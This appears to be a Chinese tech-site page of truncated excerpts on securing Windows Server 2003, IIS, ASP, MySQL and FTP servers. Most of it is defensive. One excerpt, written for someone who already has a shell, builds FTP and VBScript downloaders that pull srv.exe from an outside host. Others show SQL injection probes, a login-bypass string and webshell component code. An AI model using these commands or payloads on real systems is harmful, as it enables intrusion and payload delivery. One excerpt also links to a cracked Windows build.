技术文章

基于Windows平台下IIS运行的网站总给人一种感觉就是脆弱。早期的IIS确实存在很多问题，不过我个人认为自从Windows Server 2003发布后，IIS6及Windows Server 2003新的安全特性、更加完善的管理功能和系统的稳定性都有很大的增强。虽然从Windows Server 2003上可以看到微软不准备再发展ASP，特别是不再对Access数据库的完好支持，但是面对它的那些优势迫使我不得不舍弃Windows 2000 Server。况且我也不需要运行太多的ASP+Access，因为我的程序都是PHP+MySQL(说实话我不喜欢微软的ASP和ASPNET)，而且我确实信赖Windows Server 2003! 服务器、网站，看到这些词大家都会想到什么，不只是性能更加关注的是它的安全问题。很多人都无法做到非常完美的安全加固，因为大部分的资料都来源互联网，而互联网的资料总不是那么详尽，毕竟每个服务器的应用环境及运行程序不同。 我从事互联网这个行业只有2年时间，其间遇到了很多问题，我所管理的服务器部分是开放式(PUBLIC)的，它是向互联网的用户敞开的，所以我所面临的问题就更加的多!安全性首当其要，其次是系统的稳定性，最后才是性能。要知道服务器上存在很多格式各样的应用程序，有些程序本身就有缺陷，轻者造成服务器当机，严重的会危及到服务器的整个数据安全。 举个例子，有一台运行着300多个网站的Windows 2000 Server，一段时间里它经常Down机，发现内存泄漏特别快，几分钟时间内存使用立刻飙升到900M甚至高达1.2G，这个时候通过远程是无法访问服务器了，但是服务器系统本身却还在运行着。这个问题着实让我头疼了很长一段时间，因为如果要排查故障就要从这些网站入手，而网站的数量阻碍了我的解决进度。后来通过Filemon监控文件读取来缩小排查范围，之后对可疑网站进行隔离，最终找到故障点并解决。要知道一段小小的代码就可以让运行IIS5的 Windows 2000 Server 挂掉!而在Windows Server 2003下，应用程序的级别低中高级变更为了程序池，这样我们就可以对一个池进行设置对内存和CPU进行保护。它的这一特性让我减轻了很多的工作量并且系统也稳定了很多。 另外严重的就是安全性的问题了，无论任何文章都有一个宗旨就是尽量在服务器少开放端口，并开放必要的服务，禁止安装与服务器无关的应用程序。在 Windows 2000 Server中，目录权限都是Everyone，很多服务都是以SYSTEM权限来运行的，如Serv-U FTP 这款出色的FTP服务器平台曾经害苦了不少人，它的溢出漏洞可以使入侵者轻松的获取系统完全控制权，如果做到呢?就是因为Serv-U FTP服务使用SYSTEM权限来运行，SYSTEM的权利比Administrator的权利可大的多，注册表SAM项它是可以直接访问和修改的，这样入侵者便利用这一特性轻松在注册表中克隆一个超级管理员账号并获取对系统的完全控制权限。 我的目标:加固WEB服务器系统，使之提高并完善其稳定性及安全性。 系统环境:Windows Server 2003 Enterprise Edition With Service Pack 1(以下简称W2k3SP1)，WEB平台为IIS6，FTP平台为Serv-U FTP Server 安装配置操作系统 安装操作系统，在安装前先要先去调整服务器的BIOS设置，关闭不需要的I/O，这样节省资源又可以避免一些硬件驱动问题。务必断开服务器与网络的连接，在系统没有完成安全配置前不要将它接入网络。在安装过程中如果网卡是PNP类型的，那么应当为其网络属性只配置允许使用TCP/IP协议，并关闭在 TCP/IP上的NETBIOS，为了提供更安全的保证，应该启用TCP/IP筛选，并不开放任何TCP端口。完成操作系统的安装后，首次启动 W2K3SP1，会弹出安全警告界面，主要是让你立刻在线升级系统更新补丁，并配置自动更新功能，这个人性化的功能是W2K3SP1所独有的，在没有关闭这个警告窗口前，系统是一个安全运行的状态，这时我们应当尽快完成系统的在线更新。 修改Administrator和Guest这两个账号的密码使其口令变的复杂，并通过组策略工具为这两个敏感账号更名。修改位置在组策略中Computer Configuration-Windows Settings-Security Setting-Local Policies-Security Options下，这样做可以避免入侵者马上发动对此账号的密码穷举攻击。 服务器通常都是通过远程进行管理的，所以我使用系统自带的组件 “远程桌面”来对系统进行远程管理。之所以选择它，因为它是系统自带的组件缺省安装只需要去启用它就可以使用，支持驱动器映射、剪切板映射等应用，并且只要客户端是WindowsXP PRO都会自带连接组件非常方便，最主要还有一点它是免费的。当然第三方优秀的软件也有如:PCAnyWhere，使用它可以解决Remote Desktop无法在本地环境模式下工作的缺点。为了防止入侵者轻易地发现此服务并使用穷举攻击手段，可以修改远程桌面的监听端口: 运行 Regedt32 并转到此项: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp 注意:上面的注册表项是一个路径;它已换行以便于阅读。 2. 找到“PortNumber”子项，您会看到值 00000D3D，它是 3389 的十六进制表示形式。使用十六进制数值修改此端口号，并保存新值。 要更改终端服务器上某个特定连接的端口，请按照下列步骤操作: 运行 Regedt32 并转到此项:...

经常听到用户这样问冷刀:拥有虚拟站点的主机，该如何才能设置好用户的访问权呢? 笔者考虑了许久之后，决定借以此文回复“一度抱怨”冷刀没给答案的同志们! 其实这个问题提的很好，关于用户权限的设置确实里面蕴藏的很大的学文。权限小与大，是直接决定主机是否安全的关键，请看下文为您“量身”定做虚拟站点权限的套装! 1.首先双击“我的电脑”图标，进入操作界面。然后右击“D盘符”图标，弹出快捷菜单，选择“属性”选项，并单击“安全”栏，在到下方名称处选择Everyone用户组，并且勾选读取运行、列出文件目录、读取这三个权限，其它权限如有选中，请将其去掉。 2.单击“高级”按扭，弹出访问控制窗体，在次选择Everyone用户组，去掉“重置所有子对象的权限”复选框选项(如图1)，然后单击“确定”按钮。回到属性安全栏并选择Everyone用户组，最后单击右上角 “删除”按扭，将其删除即可。 小提示:删除了EVERYONE用户组，含义是使普通用户不能越权，而且ASP还可以正常使用。为了安全起见，其它目录也按其相同操作即可。 3.右击桌面“我的电脑”图标，单击“管理”选项，弹出计算机管理窗体。展开左侧本地用户和组，选择下方“用户”标签，按右键弹出快捷菜单，单击“新建用户”按钮。输入:leilei，设置密码为永不过期(如图2)，再单击隶属于将其加入GUEST用户组。然后进入IIS设置虚拟站点，并设置站点目录为E:\网站资源\BBSXP 5.12 正式版 ]\bbsxp(如图3)，在单击目录安全性栏目“编辑”按扭，并勾选“匿名访问”复选框，设置用户名、密码与新建leilei用户相同，最后单击“确定”按钮即可。 小提示: LEILEI这名用户是笔者随意建立的普通用户，大家在这里不必拘束，可以随意建立自己喜欢的名字。将LEILEI用户加入GUEST组，代表远程LEILEI用户可以访问本机。 然后并在IIS虚拟站点中设置了LEILEI这名用户访问权限，为远程来宾。 总结:就这样非常轻松的解决，LEILEI用户设置权限的问题。以上我们又做了非常健全的越权限制， 就算黑客得到了此用户，也只是来宾用户，丝毫危机不到你的电脑、IIS虚拟站点的安全问题，相信足以排除提升权限的忧患了。

装了2003以后，默认支持.net架构，抛弃了asp，所以刚刚安装了IIS的时候，访问是会出错的，错误提示为 Error Code 16389 超出系统资源 这是没有手动配置asp环境的缘故。 在 IIS 6.0 中，默认设置是特别严格和安全的，这样可以最大限度地减少因以前太宽松的超时和限制而造成的攻击。比如说默认配置数据库属性实施的最大 ASP 张贴大小为 204,800 个字节，并将各个字段限制为 100 KB。在 IIS 6.0 之前的版本中，没有张贴限制。导致我们学校里面的应用系统往2003移植经常会出错。这几天走了几个学校发现了一些问题，现汇总解决方案如下。 一、启用Asp支持 Windows Server 2003 默认安装，是不安装 IIS 6 的，需要另外安装。安装完 IIS 6，还需要单独开启对于 ASP 的支持。 第一步，启用Asp，进入： 控制面板 - 管理工具 -IIS(Internet 服务器)- Web服务扩展 - Active Server Pages - 允许 控制面板 - 管理工具 -IIS(Internet 服务器)- Web服务扩展 - 在服务端的包含文件 - 允许 第二步,启用父路径支持。 IIS-网站－主目录－配置－选项－启用父路径 第三步，权限分配 IIS-网站－（具体站点）－（右键）权限－Users完全控制 二、解决windows2003最大只能上载200K的限制。 先在服务里关闭iis admin service服务，找到windows\system32\inesrv\下的metabase.xml,打开，找到ASPMaxRequestEntityAllowed 把他修改为需要的值，然后重启iis admin service服务 1、在web服务扩展 允许 active server pages和在服务器端的包含文件 2、修改各站点的属性 主目录－配置－选项－启用父路径 3、使之可以上传大于 200k的文件(修改成您要的大小就可以了，如在后面补两个0，就允许20m了) c:\WINDOWS\system32\inetsrv\MetaBase....

windows server2003是目前最为成熟的网络服务器平台，安全性相对于windows 2000有大大的提高,但是2003默认的安全配置不一定适合我们的需要，所以，我们要根据实际情况来对win2003进行全面安全配置。说实话，安全配置是一项比较有难度的网络技术，权限配置的太严格，好多程序又运行不起，权限配置的太松，又很容易被黑客入侵，做为网络管理员，真的很头痛，因此，我结合这几年的网络安全管理经验，总结出以下一些方法来提高我们服务器的安全性。 第一招：正确划分文件系统格式，选择稳定的操作系统安装盘 为了提高安全性，服务器的文件系统格式一定要划分成NTFS（新技术文件系统）格式，它比FAT16、FAT32的安全性、空间利用率都大大的提高，我们可以通过它来配置文件的安全性，磁盘配额、EPS文件加密等。如果你已经分成FAT32的格式了，可以用CONVERT 盘符 /FS：NTFS /V 来把FAT32转换成NTFS格式。正确安装windows 2003 server,在网安联盟http://cqhk.14023.com/Soft/yyrj/bigsoft/200504/502.asp>有windows 2003的企业可升级版，这个一个完全破解了的版本，可以直接网上升级,我们安装时尽量只安装我们必须要用的组件，安装完后打上最新的补丁，到网上升级到最新版本！保证操作系统本身无漏洞。 第二招：正确设置磁盘的安全性,具体如下(虚拟机的安全设置，我们以asp程序为例子)重点： 1、系统盘权限设置 C:分区部分： c:\ administrators 全部(该文件夹，子文件夹及文件) CREATOR OWNER 全部(只有子文件来及文件) system 全部(该文件夹，子文件夹及文件) IIS_WPG 创建文件/写入数据(只有该文件夹) IIS_WPG(该文件夹，子文件夹及文件) 遍历文件夹/运行文件 列出文件夹/读取数据 读取属性 创建文件夹/附加数据 读取权限 c:\Documents and Settings administrators 全部(该文件夹，子文件夹及文件) Power Users (该文件夹，子文件夹及文件) 读取和运行 列出文件夹目录 读取 SYSTEM全部(该文件夹，子文件夹及文件) C:\Program Files administrators 全部(该文件夹，子文件夹及文件) CREATOR OWNER全部(只有子文件来及文件) IIS_WPG (该文件夹，子文件夹及文件) 读取和运行 列出文件夹目录 读取 Power Users(该文件夹，子文件夹及文件) 修改权限 SYSTEM全部(该文件夹，子文件夹及文件) TERMINAL SERVER USER (该文件夹，子文件夹及文件) 修改权限 2、网站及虚拟机权限设置(比如网站在E盘) 说明：我们假设网站全部在E盘wwwsite目录下，并且为每一个虚拟机创建了一个guest用户，用户名为vhost1…vhostn并且创建了一个webuser组，把所有的vhost用户全部加入这个webuser组里面方便管理 E:\ Administrators全部(该文件夹，子文件夹及文件) E:\wwwsite Administrators全部(该文件夹，子文件夹及文件) system全部(该文件夹，子文件夹及文件) service全部(该文件夹，子文件夹及文件) E:\wwwsite\vhost1 Administrators全部(该文件夹，子文件夹及文件) system全部(该文件夹，子文件夹及文件) vhost1全部(该文件夹，子文件夹及文件) 3、数据备份盘 数据备份盘最好只指定一个特定的用户对它有完全操作的权限 比如F盘为数据备份盘，我们只指定一个管理员对它有完全操作的权限 4、其它地方的权限设置 请找到c盘的这些文件，把安全性设置只有特定的管理员有完全操作权限 下列这些文件只允许administrators访问 net....

从asp程序编写到服务器配置 ASP全称Active Server Pages，是微软推出的用来取代CGI（Common Gateway Interface）的动态服务器网页技术。由于ASP比较简单易学，又有微软这个强大后台的支持，所以应用比较广泛，相对来说发现的缺陷和针对各程序的漏洞也比较多。ASP可运行的服务器端平台包括：WinNT、Win2k、WinXP和Win2003，在Win98环境下装上PWS4.0也可以运行。现在我们就针对Win2k和Win2003这两个系统来谈谈ASP的安全配置。 ASP程序安全篇： 在做安全配置前，我们先了解一下入侵者的攻击手法。现在很流行注入攻击，所谓注入攻击，就是利用提交特殊地址将ASP中引用的正常SQL语句和入侵者所需要的SQL语句一并执行，使入侵者达到入侵的目的。现在更是有一些脚本注入工具发布，使菜鸟也可以轻松完成对ASP的注入攻击。那么我们先来了解一下这些工具是怎样注入的。 首先，入侵者会对一个网站确定可不可以进行注入，假设一篇文章的地址为： http://www.scccn.com/news.asp?id=1 一般会以提交两个地址来测试，如： http://www.scccn.com/news.asp?id=1 and 1=1 http://www.scccn.com/news.asp?id=1 and 1=2 第一个地址后面加了 and 1=1，构成的SQL语句也就变为了：Select * from 表单名 where id=1 and 1=1这句话要成立就必须and前后语句都成立。那么前面的文章地址是可以访问的，后面的1=1也是客观成立的，那么第一个地址就可以正常显示；相反1=2是显然不成立的，关键就看这步了，如果提交and 1=2页面还是正常显示说明他并没有将and 1=2写入SQL语句，此站也就不存在注入漏洞；但如果提交and 1=2之后返回了错误页面则说明此站点将后面的语句带入了SQL语句并执行了，也就说明他可以进行SQL注入。（注：如果地址后面跟的是news.asp?id=‘1’就得变为news.asp?id=1’ and ‘1’=‘1来补全引号了） 那么，知道可以注入后入侵者可以做什么呢？ 这里就简单的说一下，比如提交这样的地址： http://www.scccn.com/news.asp?id=1 and exists (select * from 表名 where 列名=数据) 根据返回的正确或错误页面来判断猜的表名和列名是否正确，具体实现时是先猜表名再猜列名。当猜出表名和列名之后还可以用ASC和MID函数来猜出各列的数据。MID函数的格式为：mid(变量名,第几个字符开始读取,读取几个字符)，比如：mid(pwd,1,2)就可以从变量pwd中的第一位开始读取两位的字符。ASC函数的格式为：ASC（“字符串”），如：asc(“a”)就可以读出字母a的ASCII码了。那么实际应用的时候就可以写为：asc(mid(pwd,1,1))这样读取的就是pwd列的第一个字符的ASCII码，提交： asc(mid(pwd,1,1))>97以返回的页面是否为正确页面来判断pwd列的第一个字符的ASCII码是否大于97（a的ASCII码），如果正确就再试是否小于122（z的ASCII码）……这样慢慢缩小字符的ASCII码的范围，猜到真实的ASCII码也只是时间的问题。一位一位的猜就可以得到数据库中的用户名和密码了。还有一种ASP验证缺陷——就是用户名和密码都输’or ‘1’=‘1，构造SQL语句Select * form 表单名 where username=’’ or ‘1’=‘1’ and pwd=’’ or ‘1’=‘1’就可以达到绕过密码验证的目的。 说了那么多，其实防范的方法很简单，我们把特殊字符（如and、or、’、"）都禁止提交就可以防止注入了。ASP传输数据分为get和post两种， get是通过将数据添加到URL后提交的方式，post则是利用邮寄信息数据字段将数据传送到服务器。 那么，我们先来看看如何将get方式提交数据中的特殊字符过滤。首先要知道，IIS是以字符串的形式将get请求传给asp.dll的，在将数据传递给Request.QueryString之后，asp解析器会解析出Request.QueryString的信息，然后跟据"&“来分出各个数组内的数据。现在我们要让get方式不能提交以下字符： ‘、and、exec、insert、select、delete、update、count、*、%、chr、mid、master、truncate、char、declare 那么，防止get方式注入的代码就如下： If Request.QueryString"" Then For Each SQL_Get In Request.QueryString For SQL_Data=0 To Ubound(sql_leach_0) if instr(Request....

网络服务器的恶意网络行为包括两个方面：一是恶意的攻击行为，如拒绝服务攻击，网络病毒等等，这些行为旨在消耗服务器资源，影响服务器的正常运作，甚至服务器所在网络的瘫痪；另外一个就是恶意的入侵行为，这种行为更是会导致服务器敏感信息泄露，入侵者更是可以为所欲为，肆意破坏服务器。所以我们要保证网络服务器的安全可以说就是尽量减少网络服务器受这两种行为的影响。 基于windows做操作系统的服务器在中国市场的份额以及国人对该操作系统的了解程度，我在这里谈谈个人对维护windows网络服务器安全的一些个人意见。 如何避免网络服务器受网上那些恶意的攻击行为： (一) 构建好你的硬件安全防御系统 选用一套好的安全系统模型。一套完善的安全模型应该包括以下一些必要的组件：防火墙、入侵检测系统、路由系统等。 防火墙在安全系统中扮演一个保安的角色，可以很大程度上保证来自网络的非法访问以及数据流量攻击，如拒绝服务攻击等；入侵检测系统则是扮演一个监视器的角色，监视你的服务器出入口，非常智能地过滤掉那些带有入侵和攻击性质的访问。 (二) 选用英文的操作系统 要知道，windows毕竟美国微软的东西，而微软的东西一向都是以Bug 和 Patch多而著称，中文版的Bug远远要比英文版多，而中文版的补丁向来是比英文版出的晚，也就是说，如果你的服务器上装的是中文版的windows系统，微软漏洞公布之后你还需要等上一段时间才能打好补丁，也许黑客、病毒就利用这段时间入侵了你的系统。 如何防止网络服务器不被黑客入侵： 首先，作为一个黑客崇拜者，我想说一句，世界上没有绝对安全的系统。我们只可以尽量避免被入侵，最大的程度上减少伤亡。 (一) 采用NTFS文件系统格式 大家都知道，我们通常采用的文件系统是FAT或者FAT32，NTFS是微软Windows NT内核的系列操作系统支持的、一个特别为网络和磁盘配额、文件加密等管理安全特性设计的磁盘格式。NTFS文件系统里你可以为任何一个磁盘分区单独设置访问权限。把你自己的敏感信息和服务信息分别放在不同的磁盘分区。这样即使黑客通过某些方法获得你的服务文件所在磁盘分区的访问权限，还需要想方设法突破系统的安全设置才能进一步访问到保存在其他磁盘上的敏感信息。 (二)做好系统备份 常言道，“有备无患”，虽然谁都不希望系统突然遭到破坏，但是不怕一万，就怕万一，作好服务器系统备份，万一遭破坏的时候也可以及时恢复。 (三)关闭不必要的服务，只开该开的端口 关闭那些不必要开的服务，做好本地管理和组管理。Windows系统有很多默认的服务其实没必要开的，甚至可以说是危险的，比如：默认的共享远程注册表访问(Remote Registry Service)，系统很多敏感的信息都是写在注册表里的，如pcanywhere的加密密码等。 关闭那些不必要的端口。一些看似不必要的端口，确可以向黑客透露许多操作系统的敏感信息，如windows 2000 server 默认开启的IIS服务就告诉对方你的操作系统是windows 2000。69端口告诉黑客你的操作系统极有可能是linux或者unix系统，因为69是这些操作系统下默认的tftp服务使用的端口。对端口的进一步访问，还可以返回该服务器上软件及其版本的一些信息，这些对黑客的入侵都提供了很大的帮助。此外，开启的端口更有可能成为黑客进入服务器的门户。 总之，做好TCP/IP端口过滤不但有助于防止黑客入侵，而且对防止病毒也有一定的帮助。 (四)软件防火墙、杀毒软件 虽然我们已经有了一套硬件的防御系统，但是“保镖”多几个也不是坏事。 (五)开启你的事件日志 虽然开启日志服务虽然说对阻止黑客的入侵并没有直接的作用，但是通过他记录黑客的行踪，我们可以分析入侵者在我们的系统上到底做过什么手脚，给我们的系统到底造成了哪些破坏及隐患，黑客到底在我们的系统上留了什么样的后门，我们的服务器到底还存在哪些安全漏洞等等。如果你是高手的话，你还可以设置密罐，等待黑客来入侵，在他入侵的时候把他逮个正着。

八种文件上传大法 本文是居于已经得到了一个有一定权限的SHELL.命令行下传送文件的其他方法. 一，TFTP 格式：tftp -i get file.exe path/file.exe 默认存放在system32下，如果指定就存在指定的地方。 二：ftp下载文件 ftp下载文件一般步骤如下： echo open xxx.xxx.xxx.xxx >ftp.txt echo user »ftp.txt echo password »ftp.txt echo binary »ftp.txt [可选] echo get srv.exe »ftp.txt echo bye »ftp.txt ftp -s:ftp.txt(这一步是关键哟) del ftp.txt 这样srv.exe文件就下在下来了。保证srv.exe已经存在指定位置。 四：写程序下载 脚本是非常好的东西，只要把源码保存到一个文件中就能运行。所以在shell下，用echo语句直接写到一个文件中，在用相应的解释程序执行就可以啦。这里是一个程序实例的简化: echo Set xPost = CreateObject(“Microsoft.XMLHTTP”) >webdown.vbs echo xPost.Open “GET”,“http://txhak.126.com/srv.exe",0 »webdown.vbs echo xPost.Send() »webdown.vbs echo Set sGet = CreateObject(“ADODB.Stream”) »webdown.vbs echo sGet.Mode = 3 »webdown.vbs echo sGet.Type = 1 »webdown.vbs echo sGet.Open() »webdown....

在网上看了很多文章，但支持jsp的，试了Ｎ次都没成功，今天看到"孤独"的"jsp连接sql server 2000数据库的配置"，受到启发，自己小试了一会，果然成功。但俺用的操作系统是win2k-p的，都可以用，目前俺的ＩＩＳ已支持：ASP、ASP.NET、PHP、JSP、Perl，爽！！现将简单的说一下： 一、支持ASP 支持ASP的话，在IIS下直接设置一下就行的，不用另装软件。 二、支持ASP.NET 下载微软的Microsoft .NET Framework，直接安装。 三、支持PHP 下载PHP For IIS的软件，安装后，在IIS中添加"应用程序映射"中的扩展名关连。 四、支持JSP 1.先安装J2SDK(j2sdk-1_4_2-windows-i586.exe,下载地址) 2.配置J2SDK环境变量 JAVA_HOME=C:\j2sdk1.4.2 CLASSPATH=C:\j2sdk1.4.2\bin;.;C:\j2sdk1.4.2\lib;C:\j2sdk1.4.2\lib\dt.jar;C:\j2sdk1.4.2\lib\tools.jar 增加PATH=C:\j2sdk1.4.2;C:\j2sdk1.4.2\bin 配置完成后重启计算机 3.测试安装和配置是否正常 public class test{ public static void main(String args[]){ System.out.println(“This is a test program.”); } } 将以上代码保存为test.java,然后在命令提示符下输入javac test.java;java test 4.安装Tomact(jakarta-tomcat-4.1.30.exe,下载地址) 5.配置Tomact环境变量 CATALINA_HOME=C:\Program Files\Apache Group\Tomcat 4.1 增加CLASSPATH=C:\Program Files\Apache Group\Tomcat 4.1\common\lib\servlet.jar 配置完成后重启计算机 6.测试JSP是否正常 启动Tomact，然后在IE中输入http://locahost:8080/ ，如果网页能正常显示就说明ＯＫ了。 五、支持Perl 下载Perl For IIS，然后安装。 这样你的IIS就能支持Ｎ多脚本了，对于学习和测试都有很大的帮忙。上面所需的软件基本都有下载地址。本人的测试环境：Intel815EPT+CIII-1.1G+HardDisk 20G+SD 256M+Win2k-P(SP4)

电子商务的兴起，使的很多中小企业都拥有了自己的服务器。对内用来建立局域网，提升办公效率;对外建立网站，更为广泛地宣传企业产品和形象，争取更多客源。但是作为网络的核心产品，服务器技术相对复杂，尤其是在病毒肆虐的网络时代，安全问题显得更加突出。笔者在公司管理服务器并检查其安全性已经有段时间了，在实际工作中积累了一些经验，希望能和大家共享。 一、增强网络整体安全 很多网管往往在维护网络安全方面存在这样的误区，认为只要将服务器单机打好补丁，安装好防护墙、操作系统定期升级就可以安枕无忧了。可实际上，很多黑客和病毒并非直接攻击服务器，而是通过入侵其他计算机作为跳板来攻击整个网络的。目前很多网络都是通过域的方式来管理，一旦黑客或病毒成功入侵与服务器有信任关系的一台计算机，那么从这台计算机攻击服务器将会变得非常简单。所以要办证整个网络的安全要从根本来考虑。 首先是安全管理，要从管理角度出发，利用规章制度等文字性的材料规范，约束各种针对计算机网络的行为，例如禁止员工随便下载非法程序，禁止网络管理员以外的人员进入中心机房，完善网络管理员的值班制度等等。 其次是安全技术，要从技术角度出发，利用各种软件和硬件，各种技巧和方法来管理整个计算机网络，杀毒软件与防火墙双管齐下力保网络的安全。 这两方面缺一不可，试想如果只有安全技术的支持而在规章制度上没有进行任何约束，即使刚开始安全做的很到位，但员工随意下载非法软件，随便关闭杀毒软件的保护的话，整个网络安全形同虚设。而只有严格的规章没有技术作为支持的话病毒和黑客也会通过网络漏洞轻松入侵。因此安全管理与安全技术两方面相辅相成，网络管理员对于这两方面都要抓，力度都要硬。 二、加强服务器本地文件格式安全级别 目前服务器都采用的是windows2000以上版本，所以在加强安全级别上需要利用windows2000server提供的用户权限功能，根据每个用户的特点单独地为其制定访问服务器的特殊使用权限，从而避免因使用统一的访问服务器权限而带来的安全隐患。 为了确保服务器的安全首先要在本地文件格式上做文章，即将FAT格式转换为安全系数更高的NTFS文件格式。毕竟对于黑客来说存储在FAT格式的磁盘分区里的数据要比存储在NTFS格式的磁盘分区的数据更容易访问，也更容易破坏，另外目前所有安全软件及加密软件也都是针对NTFS格式来说的，对FAT格式的保护非常薄弱。 另外最好使用专门的网络检测软件对整个网络的运行情况进行7*24小时的不间断监视，尤其要关注“非法入侵”和“对服务器的操作”两方面的报告，笔者做在的公司就使用IISLOCK来监视网页服务器的正常运行和MRTG来检测整个网络的流量。 三、定期备份数据 数据的保护是一个非常重要的问题，也许服务器的系统没有崩溃但里面存储的数据发生了丢失，这种情况所造成的损失会更大，特别对于数据库服务器来说也许存储的是几年的珍贵数据。怎么才能有效的保护数据?备份是唯一的选择。以往对于数据的备份都是采取在服务器上另外一个区建立备份文件夹甚至是建立一个备份区。不过这样备份方法有一个非常大的弊端，那就是一旦服务器的硬盘出现问题所有分区的数据都将丢失，从而备份没有了保证。按照“不要把所有鸡蛋放到同一个篮子”的理论我们应该使用单独的专门设备保存这些珍贵数据。 使用B服务器保存A服务器的数据，同时用A服务器保存B服务器的文件，这种交叉备份的方法在一段时间非常流行。另外还有一个有效的方法就是使用磁带来保存珍贵数据，不过这样的投资会比较大。 目前笔者所在公司所采用的备份方式是通过网络存储设备NAS来保存的，将单独的NAS设备连接到网络中，定期通过工具将珍贵数据写入到NAS的硬盘中，由于NAS设备自身使用了RAID方式进行数据的冗余，所以数据得到了最好的保证。 但是数据备份也存在巨大的安全漏洞，因为备份好的数据也有可能被盗窃，所以在备份时应该对备份介质进行有效的密码保护，必要时还需要使用加密软件对这些数据进行加密，这样即使数据被盗也不会出现数据泄露的问题。

ASP木马、Webshell之安全防范解决办法正文内容： 注意：本文所讲述之设置方法与环境：适用于Microsoft Windows 2000 Server/Win2003 SERVER IIS5.0/IIS6.0 1、首先我们来看看一般ASP木马、Webshell所利用的ASP组件有那些？我们以海洋木马为列： ＜object runat="server" id="ws" scope="page" classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"＞ ＜/object＞ ＜object runat="server" id="ws" scope="page" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"＞ ＜/object＞ ＜object runat="server" id="net" scope="page" classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"＞ ＜/object＞ ＜object runat="server" id="net" scope="page" classid="clsid:F935DC26-1CF0-11D0-ADB9-00C04FD58A0B"＞ ＜/object＞ ＜object runat="server" id="fso" scope="page" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"＞ ＜/object＞ shellStr="Shell" applicationStr="Application" if cmdPath="wscriptShell" set sa=server.createObject(shellStr&"."&applicationStr;) set streamT=server.createObject("adodb.stream") set domainObject = GetObject("WinNT://.") 以上是海洋中的相关代码，从上面的代码我们不难看出一般ASP木马、Webshell主要利用了以下几类ASP组件： ① WScript.Shell (classid:72C24DD5-D70A-438B-8A42-98424B88AFB8) ② WScript.Shell.1 (classid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B) ③ WScript.Network (classid:093FF999-1EA0-4079-9525-9614C3504B74) ④ WScript.Network.1 (classid:093FF999-1EA0-4079-9525-9614C3504B74) ⑤ FileSystem Object (classid:0D43FE01-F093-11CF-8940-00A0C9054228) ⑥ Adodb.stream (classid:{00000566-0000-0010-8000-00AA006D2EA4}) ⑦ Shell....

好像phpMyADMIN还没有这个功能,但可以用phpMyAdmin通过输入语句的方法建立用户,或者一般的图形界面的SQL管理程序也可以建立和编辑用户. 这里只说使用GRANT语句的方法,当然还有直接修改MySQL表的方法,不过很麻烦,用的人不多~ 前提是有MySQL root权限 例子:建立另一个超级用户(所有权限)的方法 GRANT ALL ON . TO username@localhost IDENTIFIED BY ‘password’ WITH GRANT OPTION localhost是主机名,也可以是IP,用于限定这个用户是否可以远程连接.还可以用通配符"%",比如%.im286.com,或者202.97.224.% WITH GRANT OPTION用于指定该用户可以使用GRANT语句将权限授予别人/没有这个选项就不可以 . 中第一个星星是数据库名(*为所有数据库),第二个星星是表名(*为前面数据库下的所有表) ALL 是指全部语句的操作权限(经常看到虚拟主机等的用户没有DROP权限,就是这里做了手脚) 语法大概就是这样吧. 例子:建立一个只能可以操作数据库im286的账号im286并可以远程连接,但不能使用GRANT. GRANT ALL ON im286.* TO im286 IDENTIFIED BY ‘password’ (这就是一般免费空间或虚拟主机上的用户数据库权限,但没有远程连接) 例子:建立一个只能使用SELECT,INSERT,CREATE,DELETE,UPDATE语句的用户,不能远程连接 GRANT SELECT,INSERT,DELETE,UPDATE,CREATE ON dbname.* TO username@localhost IDENTIFIED BY ‘password’; 已建立的用户,可以用REVOKE语句收回他的权限,然后用phpMyAdmin打开mysql->user,找到那个用户名,点左边第二个的删除.用户就被完全删除了. 另外上面的dbname 为数据库名 username 为用户名 password 为密码 不能用中文 如果你直接修改相关user或priv表,可以看到的权限更多,比如关闭服务器的权限,线程控制权限,reset权限等(不说了,呵呵) 运行这些语句的方法就是,在phpMyAdmin里,找一个可以贴代码的框,把代码贴进去运行就行了.当然也可以做个php小程序 原理: mysql_connect(…); mysql_select_db…(); mysql_query(“GRANT ….”);

既然是公网ＦＴＰ服务器，就难免会遭遇一些恶意攻击，轻则丢失文件，重则造成ＦＴＰ服务器甚至整个系统崩溃。怎样才能最大限度地保证它的安全性呢？ 一、操作系统的选择 ＦＴＰ服务器首先是基于操作系统而运作的，因而操作系统本身的安全性就决定了ＦＴＰ服务器安全性的级别。虽然Ｗｉｎｄｏ ｗｓ ９８／Ｍｅ一样可以架设ＦＴＰ服务器，但由于其本身的安全性就不强，易受攻击，因而最好不要采用。Ｗｉｎｄｏｗｓ ＮＴ就像鸡肋，不用也罢。最好采用Ｗｉｎｄｏｗｓ ２０００及以上版本，并记住及时打上补丁。至于Ｕｎｉｘ、Ｌｉｎｕｘ，则不在讨论之列。 二、使用防火墙 端口是计算机和外部网络相连的逻辑接口，也是计算机的第一道屏障，端口配置正确与否直接影响到主机的安全，一般来说，仅打开你需要使用的端口，将其他不需要使用的端口屏蔽掉会比较安全。限制端口的方法比较多，可以使用第三方的个人防火墙，如天网个人防火墙等，这里只介绍Ｗｉｎｄｏｗｓ自带的防火墙设置方法。 １．利用ＴＣＰ／ＩＰ筛选功能 在Ｗｉｎｄｏｗｓ ２０００和Ｗｉｎｄｏｗｓ ＸＰ中，系统都带有ＴＣＰ／ＩＰ筛选功能，利用它可以简单地进行端口设置。以Ｗｉｎｄｏｗｓ ＸＰ为例，打开“本地连接”的属性，在“常规”选项中找到“Ｉｎｔｅｒｎｅｔ协议（ＴＣＰ／ＩＰ）”，双击它打开该协议的属性设置窗口。点击右下方的“高级”按钮，进入“高级ＴＣＰ／ＩＰ设置”。在“选项”中选中“ＴＣＰ／ＩＰ筛选”并双击进入其属性设置。这里我们可以设置系统只允许开放的端口，假如架设的ＦＴＰ服务器端口为２１，先选中“启用ＴＣＰ／ＩＰ筛选（所有适配器）”，再在ＴＣＰ端口选项中选择“只允许”，点“添加”，输入端口号２１，确定即可。这样，系统就只允许打开２１端口。要开放其他端口，继续添加即可。这可以有效防止最常见的１３９端口入侵。缺点是功能过于简单，只能设置允许开放的端口，不能自定义要关闭的端口。如果你有大量端口要开放，就得一个个地去手工添加，比较麻烦。 ２．打开Ｉｎｔｅｒｎｅｔ连接防火墙 对于Ｗｉｎｄｏｗｓ 